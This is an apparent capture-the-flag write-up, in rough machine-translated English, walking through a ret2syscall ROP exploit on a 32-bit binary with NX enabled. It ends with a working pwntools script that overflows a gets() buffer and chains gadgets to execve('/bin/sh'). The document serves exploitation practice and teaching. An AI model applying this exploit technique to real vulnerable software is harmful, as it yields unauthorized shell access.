1. Routine inspection program and run 32-bit programs, opened the NX protection, then we will fail before the write shellcode execution
2. still be covered by the return value of gets (), although of course find a / bin / sh string, we do not have system ( "/ bin / sh" ) to open the shell, then we need to function in a system call, (ps: a system function will have a corresponding system call number, which we can in Linux syscall Reference queried).
3. Here we call execve () to achieve the open shell. EAX to pass 0x0b, EBX afferent "/ bin / sh", ECX and EDX incoming 0.
4. Determine the length of the cover
5. Find gadget to pass parameters to the register, in order to construct exp. Of course, the gadget is not the only use to achieve the effect you can
6. Here I selected the following several gadget
0x080bb196 : pop eax ; ret 0x0806eb91 : pop ecx ; pop ebx ; ret 0x0806eb6a : pop edx ; ret
7. construction EXP
#!/usr/bin/env python from pwn import * p = process('./rop') #EBP: 0xffffd178 --> 0x8049630 (<__libc_csu_fini>: push ebx) #ESP: 0xffffd0f0 --> 0xffffd10c --> 0x3 bin_sh = 0x080BE408 call_gets = 0x08048E96 pop_eax = 0x080bb196 pop_ecx_ebx = 0x0806eb91 pop_edx = 0x0806eb6a int_0x80 = 0x08049421 payload = 'a'* (0x6c+4) payload += p32(pop_eax) payload += p32(0xb) payload += p32(pop_ecx_ebx) payload += p32(0) payload += p32(bin_sh) payload += p32(pop_edx) payload += p32(0) payload += p32(int_0x80) p.recvuntil('?') p.sendline(payload) p.interactive()